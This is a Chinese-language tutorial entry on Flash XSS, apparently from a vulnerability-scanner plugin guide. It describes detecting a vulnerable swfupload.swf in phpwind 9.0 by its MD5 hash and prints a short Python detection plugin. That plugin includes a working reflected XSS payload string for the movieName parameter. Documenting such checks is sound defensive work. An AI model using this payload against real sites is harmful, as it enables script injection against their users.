Flash XSS


这一类的 XSS 主要是由于 Flash 与 Js 交互过程中产生的 XSS。

检测方法:校验 flash 的 hash 值(例如: md5)

实例:

phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf XSS漏洞

由于 Flash 文件是可以下载到客户端,所以直接下载该 swf 文件,校验其 hash。根据漏洞详情,可知该 swf 文件路径为: /res/js/dev/util_libs/swfupload/Flash/swfupload.swf

范例插件

PHPWind 9.0 swfupload.swf Flash XSS

感谢插件作者: xyw55

#!/usr/bin/env python
# coding:utf-8
# @Date    : 2015-06-28
# @Author  : xyw55 ([email protected])

'''
phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf xss漏洞 POC
refer : http://wooyun.org/bugs/wooyun-2013-017731
'''
import md5


def assign(service, arg):
    if service == fingerprint.phpwind:
        return True, arg

def audit(arg):
    flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
    file_path = "/res/js/dev/util_libs/swfupload/Flash/swfupload.swf"
    url = arg
    verify_url = url + file_path

    code, head, res, redirect_url, log = hackhttp.http(verify_url)
    if code == 200:
        md5_value = md5.new(res).hexdigest()
        if md5_value in flash_md5:
            # info 中不要传 log
            security_info(url + ' phpwind Reflected XSS; plaload: /res/js/dev/util_libs/swfupload/Flash/swfupload.swf?movieName="])}catch(e){alert(1)}//')


if __name__ == '__main__':
    from dummy import *
    audit(assign(fingerprint.phpwind, 'http://www.example.com/')[1])

results matching ""

    No results matching ""